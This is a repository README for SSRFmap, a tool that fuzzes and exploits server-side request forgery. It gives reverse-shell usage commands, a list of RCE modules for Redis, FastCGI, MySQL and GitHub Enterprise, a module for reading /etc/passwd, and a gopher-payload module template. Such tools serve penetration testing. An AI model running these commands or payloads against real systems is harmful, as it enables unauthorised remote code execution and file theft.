Automatic SSRF fuzzer and exploitation tool
 
 
 
Go to file
Swissky ed066d4622 MODULE - Network scan : HTTP ping sweep of the network 2018-10-16 22:42:39 +02:00
core INFRA - Handling JSON in request + example SSRF2 (json data) 2018-10-16 12:18:00 +02:00
data INFRA - Handling JSON in request + example SSRF2 (json data) 2018-10-16 12:18:00 +02:00
modules MODULE - Network scan : HTTP ping sweep of the network 2018-10-16 22:42:39 +02:00
screenshot MODULE - MySQL and Zabbix services 2018-10-16 21:34:04 +02:00
.gitignore MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 21:22:04 +02:00
LICENSE Initial commit 2018-10-15 21:08:26 +02:00
README.md MODULE - Network scan : HTTP ping sweep of the network 2018-10-16 22:42:39 +02:00
ssrfmap.py MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 21:22:04 +02:00

README.md

SSRFmap

SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Guide / RTFM

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST]
                  [--lport LPORT]

optional arguments:
  -h, --help     show this help message and exit
  -r REQFILE     SSRF Request file
  -p PARAM       SSRF Parameter to target
  -m MODULES     SSRF Modules to enable
  -l HANDLER     Start an handler for a reverse shell
  --lhost LHOST  LHOST reverse shell
  --lport LPORT  LPORT reverse shell

The default way to use this script is the following.

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload

A quick way to test the framework can be done with data/example.py SSRF service.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules

The following modules are already implemented and can be used with the -m argument.

Name Description
fastcgi FastCGI RCE
redis Redis RCE
github Github Enterprise RCE < 2.8.7
zaddix Zaddix RCE
mysql MySQL Command execution
smtp SMTP send mail
portscan Scan ports for the host
networkscan HTTP Ping sweep over the network
readfiles Read files such as /etc/passwd

Contribute

I <3 pull requests :) Feel free to add any feature listed below or a new service.

The following code is a template if you wish to add a module interacting with a service.

from core.utils import *
import logging

name        = "servicename in lowercase"
description = "ServiceName RCE - What does it do"
author      = "Name or pseudo of the author"

class exploit():

    def __init__(self, requester, args):
        logging.info("Module '{}' launched !".format(name))

        # Data for the service
        ip   = "127.0.0.1"
        port = "6379"
        data = "*1%0d%0a$8%0d%0af[...]save%0d%0aquit%0d%0a"
        payload = wrapper_gopher(data, ip , port)

        # Handle args for reverse shell
        if args.lhost == None: payload = payload.replace("SERVER_HOST", input("Server Host:"))
        else:                  payload = payload.replace("SERVER_HOST", args.lhost)

        if args.lport == None: payload = payload.replace("SERVER_PORT", input("Server Port:"))
        else:                  payload = payload.replace("SERVER_PORT", args.lport)

        # Send the payload
        r = requester.do_request(args.param, payload)

You can also contribute with a beer IRL or with buymeacoffee.com

Coffee

Thanks to the contributors

  • ???

Inspired by